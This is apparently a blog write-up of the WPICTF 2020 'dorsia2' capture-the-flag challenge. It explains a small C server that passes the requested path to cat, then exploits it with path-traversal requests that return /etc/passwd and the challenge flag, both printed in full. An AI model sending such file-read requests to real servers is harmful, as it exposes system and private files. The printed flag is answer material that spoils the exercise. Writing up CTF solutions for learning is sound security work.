Solving dorsia2 from WPICTF CTF 2020

Posted on Mon 20 April 2020 in CTF by 0xm4v3rick

The dorsia2 from WPICTF CTF 2020 challenge had below note:

1
2
3
4
5
6
7
8
9
http://us-east-1.linodeobjects.com/wpictf-challenge-files/dorsia.webm The second card.

http://dorsia2.wpictf.xyz:31337/index.html or 31338 or 31339

Firefox doesn't like the page... try chromium.

made by: awg

Hint: flag in ~/flag.txt

Visiting the challenge URL gives us the below response. Looks like the entire source code of the web page is returned.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
HTTP 200

<!DOCTYPE html>
<html>
<title>BATEMAN APPRECIATION CLUB</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="icon" type="image/png" href="/favicon.png" >
<style>
.mySlides {display:none;}
</style>
<body>

<h2 class="w3-center">Mergers and Aquisitions</h2>

<div class="w3-content w3-display-container">
  <img class="mySlides" src="bm1.jpg" style="width:100%">
  <img class="mySlides" src="bm2.jpg" style="width:100%">
  <img class="mySlides" src="bm3.jpg" style="width:100%">
  <img class="mySlides" src="bm4.jpg" style="width:100%">
  <img class="mySlides" src="bm5.gif" style="width:100%">

  <button class="w3-button w3-black w3-display-left" onclick="plusDivs(-1)">&#10094;</button>
  <button class="w3-button w3-black w3-display-right" onclick="plusDivs(1)">&#10095;</button>
</div>

<script>
var slideIndex = 1;
showDivs(slideIndex);
function plusDivs(n){showDivs(slideIndex += n);}
function showDivs(n){var i;var x = document.getElementsByClassName("mySlides");
if(n>x.length){slideIndex=1}
if(n<1){slideIndex=x.length}
for(i=0;i<x.length;i++){
x[i].style.display = "none";  
}
x[slideIndex-1].style.display = "block";  
}
</script>
</body>
</html>

Nothing much important in code that we can use. Having a look at the webm file from the challenge note, showed us a funny spoof video of a scene from American Psycho. The important part from the video is shown below asking us to check the second card. Video also mentioned a file path traversal in that code.

scene

Lets understand the right hand side (second card) code a bit here in order to exploit it.

  • a character array is defined using char a[69]
  • the scanf function retrieves the part after GET / using %s identifier and assigns it to a array
  • Next printf will output HTTP 200 \r\n\r\n on the stdout
  • fflush will clear the stdout
  • execlp will execute cat on a. The syntax seems a bit confusing but it works somehow with a as argument repeated twice.
  • comment at the end stating to run this code in /home/ctf/web/

Having understood this much from the code, now we know that the source code displayed when viewing the challenge URL was due the fact that index.html was supplied as input to cat in that C program. When I supplied the payload of /etc/passwd in the GET request as below, it worked as expected. Note the the // after 31337.

1
http://dorsia2.wpictf.xyz:31337//etc/passwd

Response:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
HTTP 200

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
syslog:x:101:102::/home/syslog:/usr/sbin/nologin
ctf:x:1000:1000::/home/ctf:/bin/bash

So now we gather the flag using the comment from the last line of the code and the hint from the challenge note. ~/ signifies the home directory from the challenge note and we see a user ctf mentioned in the code comments as well as output of /etc/passwd. So we make the final request to get the flag.

Request:

1
http://dorsia2.wpictf.xyz:31337//home/ctf/flag.txt

Response:

1
2
3
HTTP 200

WPI{1_H4VE_2_return_SOME_VIDE0TAP3S}

Thanks for reading and thanks WPICTF team from the challs. Feel free to contact me on twitter for any queries or feedback. Cheers!!!

webappsec file read writeup lfi